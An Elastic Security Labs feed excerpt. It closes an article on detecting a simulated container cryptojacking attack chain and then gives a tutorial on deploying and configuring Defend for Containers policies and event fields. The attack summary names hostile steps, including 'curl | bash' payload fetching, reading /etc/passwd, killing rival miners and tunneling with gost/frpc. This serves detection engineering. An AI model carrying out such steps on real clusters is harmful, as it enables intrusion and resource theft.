<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image1.png" alt="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" title="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" /></p>
<p>What makes this scenario effective as a detection exercise is that every major objective of the attacker (execution, persistence, propagation, and monetization) manifests as runtime behavior inside containers. D4C's ability to observe that behavior in context allows detection engineers to follow the attack as it unfolds, rather than discovering it only after the damage is done.</p>
<h2>Tying It All Together with Attack Discovery</h2>
<p>Running individual detection rules across container runtime and Kubernetes audit telemetry produces dozens of alerts, each highlighting a single suspicious action in isolation. A defender reviewing these one by one would see a privileged pod here, a <code>curl | bash</code> there, and a burst of API enumeration somewhere else. The challenge is not generating alerts; it is recognizing that these 130+ signals are all part of the same operation.</p>
<p>This is where <a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> comes in. Attack Discovery is Elastic's generative AI capability that ingests a set of alerts and automatically correlates them into coherent attack narratives. Rather than forcing an analyst to manually pivot between individual alerts, it identifies which signals belong together and maps them to the MITRE ATT&amp;CK framework, producing a single, readable summary of what happened.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image6.png" alt="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" title="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" /></p>
<p>When pointed at the alerts generated by this simulation, Attack Discovery correctly reconstructed the full TeamPCP kill chain as a “Container Cryptojacking Attack Chain”. The summary identified:</p>
<ul>
<li><strong>Initial Access:</strong> Web server exploitation on the victim node, where <code>busybox</code> spawned from <code>python3.11</code> and executed reconnaissance commands (<code>id</code>, <code>whoami</code>, <code>uname -a</code>, <code>cat /etc/passwd</code>)</li>
<li><strong>Privilege Escalation:</strong> The <code>system:serviceaccount:kube-system:daemon-set-controller</code> is creating highly privileged pods with <code>HostPID</code>, <code>HostNetwork</code>, privileged mode, and sensitive <code>hostPath</code> volume mounts</li>
<li><strong>Defense Evasion:</strong> Competitor cryptominer cleanup via <code>pkill -9 xmrig</code> and <code>pkill -9 XMRig</code>, alongside base64-encoded Python payloads</li>
<li><strong>Tool Staging:</strong> Runtime package installation (<code>apk</code>, <code>curl</code>, <code>bash</code>, <code>python3</code>) and malicious script download via <code>curl</code> from the simulated C2 server</li>
<li><strong>C2 Infrastructure:</strong> Deployment of tunneling tools <code>gost</code> and <code>frpc</code> under <code>/opt/teampcp</code>, with a SOCKS5 proxy listening on port 1081</li>
<li><strong>Impact:</strong> A decoded and staged <code>/tmp/miner</code> binary: the cryptojacking objective</li>
</ul>
<p>The attack chain visualization maps the correlated alerts across the full MITRE ATT&amp;CK kill chain, from Initial Access through to Impact, with confirmed activity in Execution, Privilege Escalation, Defense Evasion, Discovery, and Command &amp; Control.</p>
<p>This is the payoff of combining D4C runtime telemetry with Kubernetes audit logs. Neither data source alone would produce this picture: container runtime sees the <code>curl | bash</code>, the <code>gost</code> process, and the miner binary, while the audit logs capture the DaemonSet creation, the RBAC abuse, and the API enumeration. Attack Discovery fuses both into a single narrative that a SOC analyst can act on immediately, without manually stitching together alerts across different indices and timeframes.</p>
<h2>Conclusion</h2>
<p>Across this attack chain, we observed a consistent pattern. Interactive execution within containers led to environment discovery, lateral movement via Kubernetes APIs, attempts at persistence in locations inconsistent with container design, installation of runtime tooling, tunneling activity, reconstruction of encoded payloads, and, finally, resource monetization. Each objective produced distinct runtime signals.</p>
<p>Defend for Containers’ value lies in surfacing these signals with the container and orchestration context attached. Process lineage, capability metadata, interactive execution flags, file modification telemetry, and container identity together allow detections to move beyond simple command matching and instead reason about intent and impact.</p>
<p>This scenario also highlights an important architectural boundary. While D4C provides deep runtime visibility inside containers, certain escalation steps, such as privileged workload creation or control-plane manipulation, require Kubernetes audit log telemetry for full visibility. Effective cloud-native detection, therefore, depends on combining runtime and control-plane data sources.</p>
<p>In the next phase of this series, we will extend this model beyond the container boundary and explore Kubernetes control-plane detection engineering, correlating audit logs with D4C runtime events to detect multi-stage attacks that span workloads, nodes, and the cluster itself.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/teampcp-container-attack-scenario.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - Getting Started with Defend for Containers (D4C)]]></title>
            <link>https://www.elastic.co/kr/security-labs/getting-started-with-defend-for-containers</link>
            <guid>getting-started-with-defend-for-containers</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This technical resource provides a comprehensive walkthrough of Elastic’s Defend for Containers (D4C) integration, covering Kubernetes-based deployment, the analysis of BPF-enriched runtime telemetry, and the practical application of policy-driven security controls to monitor and alert on activities within containerized Linux environments.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Linux systems remain a critical foundation for modern infrastructure, particularly in cloud-native environments where containers and orchestration platforms are the norm. As workloads move from long-lived hosts to ephemeral containers, attacker tradecraft shifts as well. Activity that once left persistent artifacts on disk is increasingly confined to short-lived, runtime behavior that can be difficult to capture using traditional log sources.</p>
<p>Detection engineering in these environments, therefore, depends heavily on runtime visibility. Understanding how processes execute inside containers, how files are accessed, and how workloads interact with the host becomes more important than relying on static indicators or post-incident artifacts.</p>
<p>Elastic provides several Linux-focused telemetry sources to support this type of detection work. In <a href="https://www.elastic.co/kr/security-labs/linux-detection-engineering-with-auditd">earlier posts in this series</a>, we focused on host-level visibility using Auditd and Auditd Manager, showing how low-level system events can be translated into high-fidelity detections. In this post, the focus shifts to Elastic’s Defend for Containers: a runtime security integration built specifically for containerized Linux workloads.</p>
<p>The goal of this article is not to document every Defend for Containers feature, but to provide a practical starting point for detection engineers: what data the integration produces and how to reason about that data. In the next part, we will look into how it can be applied to realistic container attack scenarios.</p>
<h2>Streamlined visibility with Defend for Containers</h2>
<p>We are excited to announce the arrival of Defend for Containers in the 9.3.0 release. This integration brings a streamlined approach to container security, offering a strong foundation for visibility in cloud-native infrastructures. Users can leverage a suite of detection rules tailored to defend against modern Kubernetes threats and container-specific vulnerabilities. The arrival of Defend for Containers is accompanied by <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/cloud_defend">a container-specific detection ruleset</a>, designed around realistic container and Kubernetes threat models.</p>
<p>At the time of writing, the Defend for Containers ruleset provides baseline coverage for common container attack techniques, including reconnaissance activity, credential access attempts, kubelet attacks, service account token abuse, interactive process execution, file creation and modification, interpreter abuse, encoded payload execution, tooling installation, tunneling behavior, and multiple privilege escalation vectors. Importantly, all existing container- and Kubernetes-specific detection rules <a href="https://github.com/elastic/detection-rules/pull/5685">have been made compatible with Defend for Containers</a>, allowing previously host-centric logic to operate directly on container runtime telemetry.</p>
<p>This makes Defend for Containers a practical and immediately usable data source for Linux detection engineers focused on behavior-driven runtime detection. The remainder of this post focuses on how that telemetry looks in practice and how it can be applied to real-world container attack scenarios.</p>
<h2>Introduction to Defend for Containers</h2>
<p><a href="https://www.elastic.co/kr/docs/reference/integrations/cloud_defend">Defend for Containers</a> is a runtime security integration that provides visibility into Linux containers as they execute. Instead of relying on static image scanning or post-execution logs, it focuses on observing container behavior in real time.</p>
<p>At a high level, Defend for Containers captures security-relevant runtime events from running containers, such as process execution and file access. These events are enriched with container and orchestration context and shipped into Elasticsearch, where they can be analyzed and used as input for detection rules.</p>
<p>From a detection engineering perspective, Defend for Containers sits at the intersection of traditional Linux behavior and the container context. Processes, syscalls, and file activity remain core signals, but they are now scoped to containers, namespaces, and workloads that may only exist briefly.</p>
<p>Defend for Containers is deployed as part of the Elastic Agent and integrates directly with Elastic Security. Once enabled, it provides a dedicated stream of container runtime events that can be queried using KQL or ES|QL, or consumed directly by detection analytics. This allows detection engineers to apply familiar analysis techniques while accounting for the operational realities of cloud-native workloads.</p>
<p>In the sections that follow, we will examine Defend for Containers events in more detail and walk through several container attack scenarios to illustrate how this data can be used in practice.</p>
<h3>Defend for Containers setup</h3>
<p>Before you can take advantage of Defend for Containers' runtime visibility and analytics, you need to deploy the integration and configure a policy that defines which events to observe and what actions to take when matching activity is encountered. More information about the integration and its setup can be found <a href="https://www.elastic.co/kr/docs/reference/integrations/cloud_defend">here</a>. At a high level, this setup consists of:</p>
<ol>
<li>Deploying the Defend for Containers integration via Elastic Agent in your Kubernetes environment.</li>
<li>Configuring or customizing the Defend for Containers policy, which consists of selectors that define which operations to match and responses that define what actions to take.</li>
<li>Validating and refining the policy based on observed workload behavior.</li>
</ol>
<h3>Deployment methods</h3>
<p>Defend for Containers is delivered as an Elastic Agent integration and relies on Elastic Agent to collect and forward container runtime telemetry into your Elastic Stack. For Kubernetes workloads, you install the integration via the Elastic Security UI and then enroll agents on your cluster nodes.</p>
<p>The basic deployment flow is:</p>
<p>In the Elastic Security UI, navigate to <a href="https://www.elastic.co/kr/docs/reference/fleet">Fleet</a> and create a new Agent Policy (or add the integration to an existing one). Once the Agent Policy is created, we can add the “Defend for Containers” integration to the policy.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image1.png" alt="Figure 1: Add the integration to the agent policy view" title="Figure 1: Add the integration to the agent policy view" /></p>
<p>Give the integration a name and optionally adjust the default selectors and responses (we will look into the available options further down in this publication). Once “Add integration” is selected, a new Agent Policy with the correct integration should be available.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image5.png" alt="Figure 2: Agent policy integrations overview" title="Figure 2: Agent policy integrations overview" /></p>
<p>For this demonstration, we will leverage the Kubernetes deployment method. To deploy this policy to a workload, we can navigate to Actions → Add agent → Kubernetes. Here, we see instructions for copying or downloading the Kubernetes manifest.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image19.png" alt="Figure 3: Defend for Containers Kubernetes manifest overview" title="Figure 3: Defend for Containers Kubernetes manifest overview" /></p>
<p>An important note to be aware of is: “<em>Note that the following manifest contains resource limits that may not be appropriate for a production environment. Review our guide on <a href="https://www.elastic.co/kr/docs/reference/fleet/scaling-on-kubernetes#_specifying_resources_and_limits_in_agent_manifests">Scaling Elastic Agent on Kubernetes</a> before deploying this manifest.</em>”</p>
<p>You will need to include the following <code>capabilities</code> under <code>securityContext</code> in your Kubernetes YAML for the service to work:</p>
<pre><code class="language-yaml">securityContext:
    runAsUser: 0
    capabilities:
      add:
        - BPF ## Enables both BPF &amp; eBPF
        - PERFMON
        - SYS_RESOURCE
</code></pre>
<p>After copying or downloading the provided <code>elastic-agent-managed-kubernetes.yml</code> manifest, you can edit the manifest as needed, and apply the manifest with:</p>
<pre><code class="language-bash">kubectl apply -f elastic-agent-managed-kubernetes.yml
</code></pre>
<p>As also mentioned in the manifest, review the guide “<a href="https://www.elastic.co/kr/docs/reference/fleet/running-on-kubernetes-managed-by-fleet">Run Elastic Agent on Kubernetes managed by Fleet</a>” for more deployment information.</p>
<p>Wait for the Elastic Agent pods to schedule and for data to begin flowing into Elasticsearch.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image16.png" alt="Figure 4: Defend for Containers integration input overview" title="Figure 4: Defend for Containers integration input overview" /></p>
<p>Once deployed, Elastic Agent will establish a connection to Fleet, enroll under the selected policy, and begin emitting Defend for Containers telemetry that Elastic Security can consume.</p>
<p>In the next section, we will take a look at the integration configuration options and explore which features are available to use.</p>
<h3>Defend for Containers policies</h3>
<p>At the heart of Defend for Containers' configuration is the policy. Policies determine what activity to observe and how to respond when matching events occur. Policies are composed of two fundamental building blocks:</p>
<ul>
<li><strong>Selectors:</strong> define which events are of interest by specifying operations and conditions;</li>
<li><strong>Responses:</strong> define what actions to take when a selector’s conditions are met.</li>
</ul>
<p>Defend for Containers policies can be edited before deployment or modified post-deployment via the Elastic Security UI’s policy editor.</p>
<h4>Policy structure</h4>
<p>Each policy must contain at least one selector and at least one response. A typical selector specifies one or more operations (such as process events or file activities) and uses conditions (like container image name, namespace, or pod label) to narrow the scope. Responses reference selectors and indicate what action to take when events match.</p>
<p>The default Defend for Containers policy includes two selector-response pairs: “Threat Detection” and “Drift Detection &amp; Prevention”.</p>
<p><strong>Threat detection:</strong> A <code>selector</code> named <code>allProcesses</code> matches all <code>fork</code> and <code>exec</code> events from containers.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image13.png" alt="Figure 5: Defend for Containers allProcesses selector" title="Figure 5: Defend for Containers allProcesses selector" /></p>
<p>And the associated <code>response</code> has the action set to <code>Log</code>, ensuring that events are ingested and can be analyzed.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image11.png" alt="Figure 6: Defend for Containers allProcesses log response" title="Figure 6: Defend for Containers allProcesses `log` response" /></p>
<p><strong>Drift detection &amp; prevention:</strong> A selector named <code>executableChanges</code> matches <code>createExecutable</code> and <code>modifyExecutable</code> operations.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image7.png" alt="Figure 7: Defend for Containers executableChanges selector" title="Figure 7: Defend for Containers executableChanges selector" /></p>
<p>And the response is configured to create alerts (and can be modified to block those operations).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image18.png" alt="Figure 8: Defend for Containers executableChanges alert response" title="Figure 8: Defend for Containers executableChanges `alert` response" /></p>
<p>These can be modified via the UI, but under the hood, these policies are simple YAML configuration files that can be easily modified and used in any CI|CD flows:</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: allProcesses
      operation:
        - fork
        - exec
  responses:
    - match:
        - allProcesses
      actions:
        - log
file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - alert
</code></pre>
<p>Next, we will take a look at some example selectors and responses and discuss the options you have for setting up the integration to your liking.</p>
<p><strong>Example selector snippet</strong></p>
<p>Selectors allow fine-grained matching using conditions on fields such as:</p>
<ul>
<li><code>containerImageFullName</code>: full image names like <code>docker.io/nginx</code>;</li>
<li><code>containerImageName</code>: partial image names;</li>
<li><code>containerImageTag</code>: specific tags like latest;</li>
<li><code>kubernetesClusterId</code>: Kubernetes cluster IDs;</li>
<li><code>kubernetesClusterName</code>: Kubernetes cluster names;</li>
<li><code>kubernetesNamespace</code>: namespaces where the workload runs;</li>
<li><code>kubernetesPodName</code>: pod names, with support for trailing wildcards;</li>
<li><code>kubernetesPodLabel</code>: label key/value pairs, with wildcard support.</li>
</ul>
<pre><code class="language-yaml">selectors:
  - name: nodeExports
    file:
      operations:
        - createExecutable
        - modifyExecutable
      containerImageName:
        - &quot;nginx&quot;
      kubernetesNamespace:
        - &quot;prod-*&quot;
</code></pre>
<p>In this example, the selector named <code>nodeExports</code> matches file events that create or modify executables within containers whose image names contain “nginx” and whose Kubernetes namespace begins with <code>“prod-”</code>.</p>
<p><strong>Example response snippet</strong></p>
<p>Responses determine what happens when selector conditions are met. Common actions include:</p>
<ul>
<li><code>log</code>: send the event as telemetry for analysis;</li>
<li><code>alert</code>: create an alert in Elastic Security;</li>
<li><code>block</code>: prevent the operation (for supported types).</li>
</ul>
<pre><code class="language-yaml">responses:
  - name: alertAndBlockNodeExports
    matchSelectors:
      - nodeExports
    actions:
      - alert
      - block
</code></pre>
<p>Here, the response named <code>alertAndBlockNodeExports</code> references the previously defined nodeExports selector and will both generate an alert and block the operation.</p>
<h4>Wildcards and matching</h4>
<p>Selectors in Defend for Containers support trailing wildcards in string-based conditions (such as pod names or image tags). This allows broad matching without enumerating every possible value. For example, a pod selector of <code>backend-*</code> will match all pods whose names begin with <code>backend-</code>, while a label condition such as <code>role:api*</code> matches label values that start with <code>api</code>.</p>
<p>This wildcarding is essential in dynamic environments where workloads scale and shift rapidly.</p>
<p>In addition to simple string matching, Defend for Containers selectors also support <strong>path-based wildcard semantics</strong> when matching file paths. Consider the following selector example:</p>
<pre><code class="language-yaml">- name:
  targetFilePath:
    - /usr/bin/echo
    - /usr/sbin/*
    - /usr/local/**
</code></pre>
<p>In this example:</p>
<ul>
<li><code>/usr/bin/echo</code> matches only the <code>echo</code> binary at that exact path.</li>
<li><code>/usr/sbin/*</code> matches everything that is a direct child of <code>/usr/sbin</code>.</li>
<li><code>/usr/local/**</code> matches everything recursively under <code>/usr/local</code>, including paths such as <code>/usr/local/bin/something</code>.</li>
</ul>
<p>These distinctions make it possible to precisely scope file-based selectors, balancing coverage and noise. In practice, they allow detection engineers to target specific binaries, entire directories, or deep directory trees, depending on the use case, without resorting to overly permissive rules.</p>
<h4>Tying it all together</h4>
<p>Up to this point, we have looked at Defend for Containers selectors, wildcard semantics, event types, and how they surface attacker behavior at runtime. The final step is to understand how these pieces come together within a policy to express real detection logic.</p>
<p>Consider the following policy fragment:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: binDirExeMods
      operation:
        - createExecutable
        - modifyExecutable
      targetFilePath:
        - /usr/bin/**
    - name: etcFileChanges
      operation:
        - createFile
        - modifyFile
        - deleteFile
      targetFilePath:
        - /etc/**
    - name: nginx
      containerImageName:
        - nginx

  responses:
    - match:
        - binDirExeMods
        - etcFileChanges
      exclude:
        - nginx
      actions:
        - alert
        - block
</code></pre>
<p>This policy defines three selectors. Two selectors (<code>binDirExeMods</code> and <code>etcFileChanges</code>) describe file system activity of interest, while the third selector (<code>nginx</code>) describes a container context to exclude.</p>
<p>The response section ties these selectors together. The selectors listed under <code>match</code> are logically <code>OR</code>’d, meaning that <em>either</em> condition is sufficient to trigger the response. The selector listed under <code>exclude</code> acts as a logical <code>NOT</code>, removing matching events when the container image is <code>nginx</code>.</p>
<p>Read in plain language, the policy expresses the following logic:</p>
<p><em>If an executable is created or modified anywhere under <code>/usr/bin</code>, <strong>or</strong> a file is created, modified, or deleted under <code>/etc</code>,  <strong>and</strong> the activity does not originate from an <code>nginx</code> container, then generate an alert and block the action.</em></p>
<p>In Boolean form, this can be expressed as:</p>
<pre><code class="language-text">IF (binDirExeMods OR etcFileChanges) AND NOT nginx
→ alert + block
</code></pre>
<p>This is where Defend for Containers policies become powerful. Rather than writing complex detection logic in a query language, selectors let you decompose behavior into small, reusable building blocks and then combine them declaratively. By mixing path-based selectors, operation types, container context, and exclusions, you can express nuanced detection logic that remains readable and maintainable.</p>
<p>In practice, this model allows detection engineers to translate threat hypotheses directly into policy logic: <em>what</em> behavior matters, <em>where</em> it occurs, <em>in which workloads</em>, and <em>what should happen</em> when it does.</p>
<h4>Policy validation and refinement</h4>
<p>Once a policy is deployed, it is critical to validate it against real workload behavior before enabling aggressive responses such as blocking. Policies that are too restrictive can disrupt normal container operations; policies that are too permissive may let unwanted activity go unnoticed.</p>
<p>A recommended workflow is:</p>
<ol>
<li>Deploy the default policy in monitoring mode (e.g., with selectors logging events).</li>
<li>Observe the events that appear in Elasticsearch to understand normal workload patterns.</li>
<li>Incrementally tighten selectors and responses, moving from <em>log only</em> → <em>alert</em> → <em>block</em>, testing at each stage.</li>
<li>Use a staging or test cluster to validate blocking behaviors before applying them in production.</li>
</ol>
<h3>Defend for Containers Beta limitations</h3>
<p>As of writing, Defend for Containers is available as a Beta integration, and its current capabilities and platform support reflect that status.</p>
<p>Defend for Containers formally supports Amazon EKS and Google GKE. While the integration can be deployed on Azure AKS, this configuration is not officially supported. In particular, AKS deployments currently lack file event telemetry, which limits detection coverage for file-based attack techniques in those environments.</p>
<p>The current Beta also does not capture network events. As a result, detections related to outbound connections, lateral network movement, or data exfiltration must rely on complementary data sources, such as the <a href="https://www.elastic.co/kr/docs/reference/integrations/network_traffic">Network Packet Capture integration</a> or <a href="https://www.elastic.co/kr/beats/packetbeat">Packetbeat</a> integrations, rather than on Defend for Containers telemetry alone.</p>
<p>For file activity, Defend for Containers intentionally logs file open events only when opened with write intent. This design choice reduces noise and focuses on behavior that modifies the system state. However, it also means that read-only access to sensitive files, such as secret discovery, configuration scraping, or failed access attempts, is not currently observable.</p>
<p>This limitation impacts detection use cases such as:</p>
<ul>
<li>Searching and reading Kubernetes service account tokens,</li>
<li>Scanning for <code>.env</code> files or credential material.</li>
</ul>
<p>These are areas where future Defend for Containers iterations may provide more granular telemetry to support advanced detection engineering use cases.</p>
<h3>Enabling the Defend for Containers pre-built detection rules</h3>
<p>Defend for Containers ships with a set of pre-built detection rules that provide baseline coverage for common container attack techniques. Once the integration is enabled, these rules can be activated directly from Elastic Security without additional configuration.</p>
<p>Enabling the pre-built rules is recommended as a starting point, as they are designed to align with Defend for Containers' runtime telemetry and cover execution, file modification, persistence, and post-compromise behavior inside containers. From there, the rules can be extended or refined to match environment-specific workloads and threat models.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image17.png" alt="Figure 9: Defend for Containers pre-built detection rule installation based on tag" title="Figure 9: Defend for Containers pre-built detection rule installation based on tag" /></p>
<p>By filtering for “Data Source: Elastic Defend for Containers”, you can find all rules associated with this integration.</p>
<p><strong>Note:</strong> if you do not see any rules pop up, make sure your stack is running version 9.3.0, as these rules are deployed only on 9.3.0+.</p>
<p>With all important Beta limitations mapped, the integration deployed, the pre-built detection rules installed and enabled, and a working policy in place, the next step is to explore the event semantics Defend for Containers produces, including fields commonly used in detection logic, performance considerations, and how these events differ from Elastic Defend events.</p>
<h2>Analyzing Defend for Containers events</h2>
<p>Now that Defend for Containers is deployed and policies are in place, the next step is understanding the events it generates. Similar to working with Elastic Defend or Auditd Manager, Defend for Containers telemetry becomes far more valuable once you develop a mental model of how events are structured and which fields are most relevant for detection engineering.</p>
<p>Defend for Containers produces multiple event types, most notably process events and file events, each enriched with container, host, and orchestration context. While the underlying signals remain rooted in Linux behavior, the additional Kubernetes and container metadata enable you to reason about activity in ways not possible with host-only telemetry.</p>
<p>The following sections walk through the most important field groups and event types, using real Defend for Containers events as reference points.</p>
<h3>Common fields</h3>
<p>Before diving into specific event categories, it is useful to understand the fields that consistently appear across Defend for Containers telemetry. These fields provide the contextual glue that ties individual runtime actions back to policies, selectors, and the underlying execution points inside the kernel.</p>
<p>While process and file events differ in their details, the fields described below are present across Defend for Containers data streams and are often the first place to look when validating detections or troubleshooting policy behavior.</p>
<h4>Defend for Containers-specific context</h4>
<p>Defend for Containers adds several fields specific to how events are collected and policies are applied.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image10.png" alt="Figure 10: Defend for Containers’ important cloud_defend.* fields overview" title="Figure 10: Defend for Containers’ important `cloud_defend.*` fields overview" /></p>
<p>The <code>cloud_defend.hook_point</code> field indicates where in the kernel the event was captured. In the example shown, values such as <code>tracepoint__sched_process_fork</code> and <code>tracepoint__sched_process_exec</code> reveal that the event was generated from kernel tracepoints associated with process creation and execution.</p>
<p>The <code>cloud_defend.matched_selectors</code> field shows which selectors in the active policy matched the event. In the example, the value <code>allProcesses</code> indicates that this event matched a broad selector that captures all process activity. When tuning policies or investigating alerts, this field is essential for understanding <em>why</em> an event was captured.</p>
<p>The <code>cloud_defend.package_policy_id</code> and <code>cloud_defend.package_policy_revision</code> fields tie the event back to a specific Elastic Agent policy and its revision. This makes it possible to correlate events with configuration changes over time and to verify which version of a policy was active when the event occurred.</p>
<h4>Event metadata</h4>
<p>Defend for Containers events follow the <a href="https://www.elastic.co/kr/docs/reference/ecs">Elastic Common Schema</a> conventions and include standard event metadata that describes the activity's type and lifecycle.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image2.png" alt="Figure 11: Defend for Containers’ important event.* fields overview" title="Figure 11: Defend for Containers’ important `event.*` fields overview" /></p>
<p>The <code>event.category</code> field identifies the high-level type of activity, such as <code>process</code> or <code>file</code>, and is typically the first field used when filtering Defend for Containers data. The <code>event.action</code> field describes what occurred, for example, <code>fork</code> or <code>exec</code> for process activity, or <code>open</code>, <code>creation</code>, <code>modification</code>, and <code>deletion</code> for file events.</p>
<p>The <code>event.type</code> field adds lifecycle context, such as <code>start</code> for process execution, and is often used together with <code>event.action</code> to distinguish different phases of activity. The <code>event.dataset</code> field indicates the originating Defend for Containers data stream, such as <code>cloud_defend.process</code>, which is useful when building dataset-scoped queries or detections.</p>
<p>Additional metadata fields like <code>event.id</code>, <code>event.ingested</code>, and <code>event.kind</code> are primarily used for correlation, ordering, and troubleshooting rather than detection logic.</p>
<h4>Host information</h4>
<p>Defend for Containers events include full host context, similar to Elastic Defend and Auditd Manager. This makes it possible to correlate container runtime activity back to the underlying Kubernetes node.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image9.png" alt="Figure 12: Defend for Containers’ important host.* fields overview" title="Figure 12: Defend for Containers’ important `host.*` fields overview" /></p>
<p>The <code>host.name</code> field identifies the node on which the container is running, while <code>host.os.*</code> provides operating system details such as distribution and kernel version. The <code>host.architecture</code> field indicates the CPU architecture, which can be relevant when analyzing binary execution or kernel-specific behavior.</p>
<p>One particularly useful field is <code>host.pid_ns_ino</code>, which identifies the PID namespace. This field allows container activity to be correlated with host-level process and kernel telemetry, and is especially valuable when investigating container escape attempts or node-level impact.</p>
<p>This host context is critical when analyzing cloud-native attacks, as multiple containers often share the same host and kernel, and a container's runtime behavior can have implications beyond its boundaries.</p>
<h4>Container and orchestrator context</h4>
<p>Defend for Containers' primary strength lies in its container awareness. Every runtime event is enriched with container and orchestration metadata, allowing activity to be analyzed in the context of <em>what</em> is running, <em>where it is running</em>, and <em>with which privileges</em>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image8.png" alt="Figure 13: Defend for Containers’ important container.* fields overview" title="Figure 13: Defend for Containers’ important `container.*` fields overview" /></p>
<p>At the container level, fields such as <code>container.id</code> and <code>container.name</code> uniquely identify the running container, while <code>container.image.name</code>, <code>container.image.tag</code>, and the image hash provide visibility into the workload’s origin and version. This is especially useful for distinguishing between expected utility images and unexpected or ad hoc workloads.</p>
<p>A key field for risk assessment is <code>container.security_context.privileged</code>. This field explicitly indicates whether a container is running in privileged mode. When privileged execution is combined with other signals such as interactive shells or broad Linux capabilities, the risk profile of any detected activity increases significantly.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image3.png" alt="Figure 14: Defend for Containers’ important orchestrator.* fields overview" title="Figure 14: Defend for Containers’ important `orchestrator.*` fields overview" /></p>
<p>Defend for Containers also enriches events with orchestration context. Fields such as <code>orchestrator.cluster.name</code>, <code>orchestrator.namespace</code>, and <code>orchestrator.resource.name</code> (typically the Pod name) tie runtime behavior back to Kubernetes workloads. Labels exposed via <code>orchestrator.resource.label</code> further allow detections to incorporate workload intent and ownership.</p>
<p>For detection engineering, this context enables precise scoping of detections to:</p>
<ul>
<li>specific namespaces (for example, <code>kube-system</code>),</li>
<li>privileged or high-risk containers,</li>
<li>workloads with sensitive labels,</li>
<li>or known utility images such as <code>netshoot</code>, <code>kubectl</code>, or <code>curl</code>.</li>
</ul>
<p>This layer of enrichment allows container-aware detection logic to be expressed directly, without having to infer intent indirectly from filesystem paths, cgroups, or namespace identifiers.</p>
<h3>Process events</h3>
<p>Process execution is one of the most important signal types that Defend for Containers provides. Process events capture <code>fork</code>, <code>exec</code>, and <code>end</code> activities within containers and expose detailed lineage information critical to understanding how execution unfolds at runtime.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image12.png" alt="Figure 15: Defend for Containers’ important process.* fields overview" title="Figure 15: Defend for Containers’ important `process.*` fields overview" /></p>
<p>Several fields are particularly important for detection engineering. The combination of <code>process.name</code> and <code>process.executable</code> identifies what was executed and from where, while <code>process.args</code> provides insight into how it was invoked. Fields such as <code>process.pid</code>, <code>process.start</code>, <code>process.end</code>, and <code>process.exit_code</code> describe the process lifecycle and are useful for timing analysis and execution-flow reconstruction. The <code>process.entity_id</code> provides a stable identifier that allows processes to be tracked across multiple related events.</p>
<p>Defend for Containers also captures rich ancestry information. Fields under <code>process.parent.*</code> describe the immediate parent process, making it possible to detect suspicious parent–child relationships such as shells spawned by unexpected binaries. In addition, <code>process.entry_leader.*</code> and <code>process.session_leader.*</code> provide higher-level anchors within the process tree.</p>
<p>Much like Elastic Defend, Defend for Containers models processes as a graph rather than isolated events. The entry leader is especially useful in container environments, as it often represents the initial process launched by the container runtime (for example, <code>containerd</code>, <code>runc</code>, or a shell specified as the container entrypoint). Anchoring detections to the entry leader allows process trees to be interpreted consistently, even when containers spawn many short-lived child processes.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image15.png" alt="Figure 16: Defend for Containers’ important process.session* fields overview" title="Figure 16: Defend for Containers’ important `process.session*` fields overview" /></p>
<p>Session leader fields provide additional context about interactive execution and session boundaries, helping distinguish background services from interactive or attacker-driven activity.</p>
<p>Together, these fields make it possible to express detection logic that goes beyond single executions and instead reasons about execution chains, lineage, and intent, which is essential for detecting real-world container attack techniques.</p>
<h4>Capabilities and privilege context</h4>
<p>One of the more powerful aspects of the Defend for Containers process events is the inclusion of Linux capability information. For each process, Defend for Containers exposes both the effective and permitted capability sets via:</p>
<ul>
<li><code>process.thread.capabilities.effective</code></li>
<li><code>process.thread.capabilities.permitted</code></li>
</ul>
<p>These fields describe what a process is actually allowed to do at runtime, independent of its user ID or container boundary.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image14.png" alt="Figure 17: Defend for Containers’ important process.thread.capabilities.* fields overview" title="Figure 17: Defend for Containers’ important `process.thread.capabilities.*` fields overview" /></p>
